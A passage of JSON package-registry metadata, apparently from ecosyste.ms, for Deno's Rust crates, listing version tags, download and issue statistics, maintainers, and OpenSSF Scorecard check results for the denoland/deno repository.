ps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T03:52:14.023Z","dependent_packages_count":2,"downloads":692970,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":96.55316598603426,"dependent_repos_count":28.723352358651645,"dependent_packages_count":33.8204651097963,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":53.03232781816073},"purl":"pkg:cargo/deno_permissions","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_permissions","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_permissions","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_permissions/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2024-03-13T16:47:37.895Z","updated_at":"2024-03-13T16:47:37.895Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2024-03-13T16:47:37.931Z","updated_at":"2024-03-13T16:47:37.931Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047433,"name":"deno_http","ecosystem":"cargo","description":"HTTP server implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":254,"first_release_published_at":"2021-07-12T23:33:09.322Z","latest_release_published_at":"2026-08-06T11:47:36.262Z","latest_release_number":"0.255.0","last_synced_at":"2026-08-29T21:57:42.968Z","created_at":"2022-04-12T10:00:41.653Z","updated_at":"2026-08-29T21:57:42.968Z","registry_url":"https://crates.io/crates/deno_http/","install_command":"cargo install deno_http","documentation_url":"https://docs.rs/deno_http/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using 